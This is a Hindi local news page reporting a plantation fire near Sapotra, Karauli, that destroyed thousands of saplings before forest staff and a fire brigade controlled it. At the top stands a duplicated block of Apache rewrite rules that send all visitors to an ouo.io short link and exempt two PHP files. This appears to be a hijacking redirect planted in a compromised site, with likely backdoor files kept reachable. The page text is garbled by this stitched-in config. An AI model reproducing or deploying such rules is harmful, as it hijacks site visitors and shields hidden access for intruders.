
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 629
Previous Nextसपोटरा (करौली)। सपोटरा उपखंड के प्रसिद्ध शक्तिपीठ बरवासन देवी एवं ग्राम पंचायत अमरवाड़ के वनी देवी प्लांटेशन में कल दूसरे दिन आग लग जाने से करीब 4-5 हजार पौधे जलकर खाक हो गये। घटना की सूचना मिलने पर क्षेत्रीय वन अधिकारी गिर्राज प्रसाद मीणा व पुलिस टीम मौके पर पहुंची तथा दमकल व ग्रामीणों की मदद से करीब तीन घंटे में आग पर काबू पाया गया।
प्रत्यक्षदर्शियों के अनुसार कल दोपहर करीब 2 बजे वननाका सदर अंतर्गत वनी देवी प्लांटेशन में अचानक पेड़-पौधों के पत्तों में आग लग गई। जिसके कारण 50 हैक्टयर्स के प्लांटेशन में करीब 25-30 हैक्टयर्स में 4-5 हजार पौधे तथा दर्जनों चीरोल,छीला,बेरिया आदि के पेड़ जलकर राख हो गये।
घटना की सूचना मिलने पर क्षेत्रीय वन अधिकारी गिर्राज प्रसाद मीणा के नेतृत्व में वनकर्मी पुलिस हैड़ कांस्टेबल बनेसिंह के नेतृत्व में मौके पर पहुंचे तथा आग की लपटे तेजी से फैलने के कारण जिला मुख्यालय पर दमकल को सूचना दी गई। जिस पर शाम करीब 5 बजे दमकल घटनास्थल पर पहुंची तथा दमकल व वन विभाग के कार्मिक आग बुझाने में जुट गये। करीब 3 घंटे की मशक्कत के बाद आग पर काबू पाया गया। वनी देवी प्लांटेशन 30 साल पूर्व चारागाह भूमि से रूपांतरित कर सामाजिक वानिकी विभाग के सुपुर्द कर दिया गया।